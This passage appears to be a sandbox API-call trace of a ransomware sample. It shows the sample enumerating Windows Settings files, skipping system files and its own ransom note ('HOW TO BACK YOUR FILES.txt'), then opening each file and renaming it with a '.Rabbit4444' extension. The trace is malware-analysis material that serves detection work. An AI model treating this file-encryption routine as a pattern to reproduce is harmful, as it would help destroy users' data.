(lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="windows") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="boot") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.305] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms" | out: lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms") returned="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms" [0056.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.305] lstrlenW (lpString="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms") returned 60 [0056.305] lstrlenW (lpString="Rabbit4444") returned 10 [0056.305] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.305] lstrlenW (lpString=".dll") returned 4 [0056.305] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.305] lstrlenW (lpString=".lnk") returned 4 [0056.305] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.306] lstrlenW (lpString=".ini") returned 4 [0056.306] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.306] lstrlenW (lpString=".sys") returned 4 [0056.306] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpageoverview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.306] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.306] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14761661881) returned 1 [0056.306] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1193) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0056.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0056.306] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0056.307] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0056.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.308] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14761904853) returned 1 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0056.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0056.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.308] CloseHandle (hObject=0x298) returned 1 [0056.309] CloseHandle (hObject=0x278) returned 1 [0056.309] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms.Rabbit4444") returned 188 [0056.309] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpageoverview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpageoverview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.310] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefeb5d90, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefeb5d90, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", cAlternateFileName="AAA_SE~4.SET")) returned 1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2=".") returned 1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="..") returned 1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="windows") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="boot") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.310] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.310] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms" | out: lpString1="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms") returned="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms" [0056.310] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.311] lstrlenW (lpString="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms") returned 60 [0056.311] lstrlenW (lpString="Rabbit4444") returned 10 [0056.311] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.311] lstrlenW (lpString=".dll") returned 4 [0056.311] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.311] lstrlenW (lpString=".lnk") returned 4 [0056.311] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.311] lstrlenW (lpString=".ini") returned 4 [0056.311] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.311] lstrlenW (lpString=".sys") returned 4 [0056.311] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpagesettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.311] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.311] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14762190962) returned 1 [0056.311] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1193) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.311] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0056.313] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0056.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14762467129) returned 1 [0056.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.314] CloseHandle (hObject=0x298) returned 1 [0056.314] CloseHandle (hObject=0x278) returned 1 [0056.314] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms.Rabbit4444") returned 188 [0056.314] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpagesettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupdatasensemainpagesettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.315] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf07a6a5a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf07a6a5a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", cAlternateFileName="AA0FEE~1.SET")) returned 1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2=".") returned 1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="..") returned 1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="windows") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="boot") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.315] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.315] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms" [0056.315] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.316] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms") returned 57 [0056.316] lstrlenW (lpString="Rabbit4444") returned 10 [0056.316] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.316] lstrlenW (lpString=".dll") returned 4 [0056.316] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.316] lstrlenW (lpString=".lnk") returned 4 [0056.316] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.316] lstrlenW (lpString=".ini") returned 4 [0056.316] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.316] lstrlenW (lpString=".sys") returned 4 [0056.316] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessfilterkeys.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.316] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14762716293) returned 1 [0056.316] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1181) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.317] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.320] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.321] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14763207526) returned 1 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.321] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.322] CloseHandle (hObject=0x298) returned 1 [0056.322] CloseHandle (hObject=0x278) returned 1 [0056.322] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms.Rabbit4444") returned 185 [0056.322] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessfilterkeys.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessfilterkeys.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.322] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0d03efc, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf0d03efc, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", cAlternateFileName="AAB00A~1.SET")) returned 1 [0056.322] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.322] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2=".") returned 1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="..") returned 1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="windows") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="boot") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.323] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.323] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms" [0056.323] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.324] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms") returned 55 [0056.324] lstrlenW (lpString="Rabbit4444") returned 10 [0056.324] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.324] lstrlenW (lpString=".dll") returned 4 [0056.324] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.324] lstrlenW (lpString=".lnk") returned 4 [0056.324] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.324] lstrlenW (lpString=".ini") returned 4 [0056.324] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.324] lstrlenW (lpString=".sys") returned 4 [0056.324] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessnarrator.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.324] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.324] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14763485221) returned 1 [0056.324] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1171) returned 1 [0056.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.324] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.325] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.326] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14763725409) returned 1 [0056.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.327] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 